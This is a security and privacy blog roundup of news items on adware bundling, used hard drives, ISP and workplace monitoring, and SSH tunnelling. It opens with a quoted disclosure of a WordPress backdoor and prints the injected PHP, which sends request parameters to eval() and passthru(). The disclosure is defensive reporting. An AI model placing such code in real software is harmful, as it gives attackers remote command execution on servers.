According to Ivan Fratric of http://ifsec.blogspot.com/:

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }

Not to beat a dead horse but check this out. Today internetnews.com’s Ryan Naraine reported on the addition of new software in the next version of aim. According to Naraine AOL has made a deal with weather bug to include the weather bug software in the next version of AIM. What this means is that not only will AIM be including the spy ware ridden Wild Tangent, but now the ad ware ridden weather bug will also be included.

FlexBeta.Net reviewed two spyware removal tools, one named Ad-Aware and the other named Spybot - Search and Destroy.

Their test setup was a Windows 2000 Professional setup inside virtual PC software called vmware with 28 programs known to contain spyware and adware installed. Check out how bad their Internet Explorer looked and their desktop!

Tom Vogt has made a great point with his latest article on security focus. In his article Tom articulates his points in this summary;

The vast majority of corporate networks rely on perimeter defence as their primary security feature. Once inside, an attacker seldom has trouble taking over as much of the network as he likes.

Insecure client machines are primary targets, and can not adequately be protected by border firewalls, a mail server's anti virus software or physical walls alone, and client machines are almost always granted higher access levels than they strictly require. The security of any given system is always that of the weakest link.

The technology exists to mitigate these risks but it is complex, seldom-used and impacts the "user experience". In other words, it makes it harder to work with the computer systems. Hardening each client is a non-trivial task, and the administration of secure operating systems with features such as RBAC or MAC requires skills that too few administrators have. The walls around our cities are high and strong. Inside, we are still building wooden huts.

Today, Gary O’SHEA and Nic Cecil of Online Sun reported that the London infomin (news speak for information ministry) planes to have all new motor vehicles fitted with a tracking/monitoring devices that would pin point and monitor every vehicle on the road. According to the authors this new monitoring device would record and report every time the driver of the motor vehicle drifted over the speed limit, wandered into a bus lane, or stopped on a yellow line. The authors believe that this new system would essentially install a computerized spy in each car.

A college professor once told me, “Don’t leave old hard drives or disk out in the trash, data miners pay a lot of money for information that’s left dormant on these drives”. Apparently what this professor said couldn’t have been truer. According to JUSTIN POPE of sfgate.com Simson Garfinkel and Abhi Shelat of MIT purchased 159 used hard drives, of which they were able to harvest personal information from 49 of the drives. Using rough numbers it’s plain to see that of the supposed 150,000 retired hard drives of the past year a third of the drives contain personal information that can be used by every one from thieves and identity thieves to shady marketing companies like Double Click. The point I’m trying to make is that if the general public practiced safe and secure computing habits these problems wouldn’t exist. If the drives had been over written by one of the more then 40 programs available the information that was once contained on these drives would no longer exist. In fact older versions of tool included in Norton utilities called “speed disk” had an option to over write a hard drive after defragmenting, what a novel concept.

An article written by Mark Berniker for internetnews.com provides some scary insight to President Bush’s new plan to make internet service providers monitor and track their own users. Berniker states “Experts say the Bush administration wants to create an "early warning center," which would give it the power to monitor any aspect of Internet use in the U.S.” He goes onto explain that it’s not known what exactly ISPS will be responsible for.

Excerpt of a Wired.com news story titled "IM Users: Your Boss Is Watching": "Instant messaging -- a tool many perceive as off-limits to the prying eyes of employers -- may soon be going the way of e-mail.

In the interests of record-keeping and tighter security, industry analysts say a growing number of companies that allow instant messaging in the office are also monitoring its usage."

It seems like the only way to ensure that your personal communications is secure at work when they are monitoring all kinds of stuff is to leave your home computer on that acts as an SSH server, boot up a CD-based distribution of Linux such as Knoppix at the place you work at or feel generally insecure communicating at, ssh into your home computer from there, and then tunnel all your stuff over it. (Tunneling your web browsing can be done by running a socks or web proxy on your home machine that only accepts connections from localhost, and then mapping a local port via ssh to be tunneled over the SSH connection to the port of the proxy on your home machine and then you would set your web browser's proxy settings to the local port you mapped over the SSH session.) That way your communications would be fully encrypted (at least to your home computer) and the boss or whomever is doing the monitoring wouldn't be able to snoop on what's being sent and received.

Then again, if you have something to say that you don't want your boss to see it is probably easier/best to just not say it at work at all.

Links:
A related story: TechTV: Message to Employees: Expect No Privacy
Anonymizer - Online Privacy and Security

More information on SSH:
SSH Features
SSH port forwarding features
Tunneling VNC over SSH (What is VNC?)